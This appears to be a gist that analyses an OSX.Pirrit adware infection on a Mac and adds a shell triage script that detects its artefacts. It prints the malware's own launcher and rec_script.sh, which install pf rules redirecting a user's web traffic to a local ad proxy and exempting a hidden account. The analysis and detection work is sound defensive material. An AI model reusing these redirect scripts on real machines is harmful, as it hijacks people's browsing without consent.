Last active
July 6, 2016 21:32
Update: found it: it's the OSX.pirrit virus, see here:
http://www.cybereason.com/cybereason-labs-analysis-the-minds-behind-the-osx-pirrit/
Saw a bunch of those running (as root) in htop:
$ ls /etc/*.sh
/etc/Dicyemida.sh*
/etc/Fulah.sh*
/etc/Gothism.sh*
/etc/audile.sh*
/etc/axogamy.sh*
/etc/bacteriohemolysin.sh*
/etc/branchiosaurian.sh*
/etc/duello.sh*
/etc/entry.sh*
/etc/gallflowerUpd.sh*
/etc/hemodystrophy.sh*
/etc/lichenlike.sh*
/etc/overreach.sh*
/etc/retinene.sh*
/etc/run_upd.sh*
/etc/sidereally.sh*
/etc/tealess.sh*
/etc/thiocyanide.sh*
/etc/unwittingly.sh*
All the scripts look the same:
if [ -a /Library/branchiosaurian/Contents/MacOS/branchiosaurian ];
then
    sleep 10
    sudo pfctl -evf /etc/branchiosaurian.conf
    sudo -u Benjy /Library/branchiosaurian/Contents/MacOS/branchiosaurian
fi
exit 0
Each of them has a folder in /Library/<name>.
/Library/<name>/Contents/MacOS/<name> is a Mach-O C++ executable, with deps on Qt4 frameworks stuff (core, gui and network)
and a script in Contents/MacOS/rec_script.sh which contains:
# set redirections
HIDDEN_USER=$(sudo defaults read /Library/Preferences/com.common.plist user_id)
echo $HIDDEN_USER
activeInterface=$(route get default | sed -n -e 's/^.*interface: //p')
if [ -n "$activeInterface" ]; then
    pfData="rdr pass inet proto tcp from $activeInterface to any port 80 -> 127.0.0.1 port 9882\n\
pass out on $activeInterface route-to lo0 inet proto tcp from $activeInterface to any port 80 keep state\n\
pass out proto tcp all user "$HIDDEN_USER"\n"
    echo "$pfData" > /etc/pf_proxy.conf
else
    echo "Unable to find active interface"
    exit 1
fi
exit 0
They also have a .conf in /etc
$ cat /etc/unwittingly.conf
rdr pass inet proto tcp from en1 to any port 80 -> 127.0.0.1 port 9882
pass out on en1 route-to lo0 inet proto tcp from en1 to any port 80 keep state
pass out proto tcp all user indianaite
And `ps aux` shows a pfctl process running like this:
pfctl -evf /etc/<name>.conf
I managed to run one of the executables, here's the output:
./unwittingly
void AdsProxyEngine::init()Ads enabled
bool WebProxy::startProxyServer(unsigned int, QString) "/Library/Preferences/com.unwittingly.plist"
bool WebProxy::startProxyServer(unsigned int, QString) failed starting web proxy server
Started = false
bool AdsProxyEngine::startServer() Could not start proxy server
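The layout described above (an /etc/<name>.sh launcher that loads /etc/<name>.conf with pfctl and runs /Library/<name>/Contents/MacOS/<name> as a second user, plus a pf ruleset that redirects outbound port 80 to 127.0.0.1:9882 and exempts that user) is regular enough to check for mechanically. The script below is an added triage example, not the gist author's code and not from the Cybereason write-up. It assumes a root directory argument (so it can be pointed at / on a Mac, or at a throwaway tree), and it embeds a constructed fixture: the unwittingly.conf lines are copied from the gist, the launcher is the gist's template filled in with the same name and the user the conf exempts, and a benign rotate.sh is added so the scan has something to ignore.

```shell
#!/bin/sh
# Added triage script for the OSX.Pirrit artefacts described in the gist above.
# Not the gist author's code. Indicators checked (all from the gist):
#   /etc/<name>.sh   loads /etc/<name>.conf via pfctl and runs
#   /Library/<name>/Contents/MacOS/<name> as another user via sudo -u;
#   the pf ruleset redirects port 80 to 127.0.0.1:9882 and exempts that user.
# Assumption (mine): paths are taken relative to a root directory argument.

# Print the local port a pf ruleset redirects port-80 traffic to
# (9882 in the gist). Exit 1 if the ruleset has no such rdr rule.
pf_redirect_port() {
    sed -n 's/^rdr pass inet proto tcp from [^ ]* to any port 80 -> 127\.0\.0\.1 port \([0-9]*\).*/\1/p' "$1" \
        | head -n 1 | grep .
}

# Print the user the ruleset lets bypass the redirect
# ("pass out proto tcp all user <name>"). Exit 1 if absent.
pf_hidden_user() {
    sed -n 's/^pass out proto tcp all user[[:space:]]*\([^[:space:]]*\).*/\1/p' "$1" \
        | head -n 1 | grep .
}

# Does a script match the launcher template? Print "<name> <user>" when it
# both loads a pf ruleset from /etc and runs a /Library/<name> payload as
# another user; exit 1 otherwise (ordinary admin scripts in /etc fall through).
launcher_target() {
    grep -q 'pfctl -e.*/etc/.*\.conf' "$1" || return 1
    sed -n 's|^[[:space:]]*sudo -u \([^[:space:]]*\) /Library/\([^/]*\)/Contents/MacOS/.*|\2 \1|p' "$1" \
        | head -n 1 | grep .
}

# Walk ROOT/etc/*.sh and print one line per launcher found:
#   <name> <launcher user> <proxy port> <pf-exempt user> <payload present|missing>
# Exit 0 if anything was found, 1 if the tree looks clean.
scan_pirrit() {
    root=$1
    found=1
    for script in "$root"/etc/*.sh; do
        [ -f "$script" ] || continue
        target=$(launcher_target "$script") || continue
        name=${target%% *}
        user=${target#* }
        conf="$root/etc/$name.conf"
        port=-
        exempt=-
        if [ -f "$conf" ]; then
            port=$(pf_redirect_port "$conf") || port=-
            exempt=$(pf_hidden_user "$conf") || exempt=-
        fi
        payload="$root/Library/$name/Contents/MacOS/$name"
        if [ -x "$payload" ]; then state=present; else state=missing; fi
        echo "$name $user $port $exempt $state"
        found=0
    done
    return $found
}

# Constructed fixture (not a real infection). The .conf lines are copied from
# the gist; the launcher is the gist's template with the same name and the
# user that the conf exempts; rotate.sh is a benign script the scan must skip.
make_fixture() {
    fx_root=$(mktemp -d)
    mkdir -p "$fx_root/etc" "$fx_root/Library/unwittingly/Contents/MacOS"
    cat > "$fx_root/etc/unwittingly.sh" <<'EOF'
if [ -a /Library/unwittingly/Contents/MacOS/unwittingly ];
then
    sleep 10
    sudo pfctl -evf /etc/unwittingly.conf
    sudo -u indianaite /Library/unwittingly/Contents/MacOS/unwittingly
fi
exit 0
EOF
    cat > "$fx_root/etc/unwittingly.conf" <<'EOF'
rdr pass inet proto tcp from en1 to any port 80 -> 127.0.0.1 port 9882
pass out on en1 route-to lo0 inet proto tcp from en1 to any port 80 keep state
pass out proto tcp all user indianaite
EOF
    : > "$fx_root/Library/unwittingly/Contents/MacOS/unwittingly"
    chmod +x "$fx_root/Library/unwittingly/Contents/MacOS/unwittingly"
    printf '#!/bin/sh\nfind /var/log -name "*.gz" -mtime +30 -delete\n' > "$fx_root/etc/rotate.sh"
    echo "$fx_root"
}

# Usage on a live Mac: sudo sh pirrit_triage.sh /
if [ $# -gt 0 ]; then
    scan_pirrit "$1" || echo "no Pirrit launchers found under $1"
fi
```

The scan only reports; it does not touch pf or the files. On a hit, the same columns tell you what to remove by hand: the /etc/<name>.sh and /etc/<name>.conf pair, the /Library/<name> bundle, and the exempt user, whose name the rec_script.sh above reads from /Library/Preferences/com.common.plist. `sudo pfctl -sr` shows whether the rdr rule is still loaded, and `sudo pfctl -d` disables pf until the ruleset has been cleaned up.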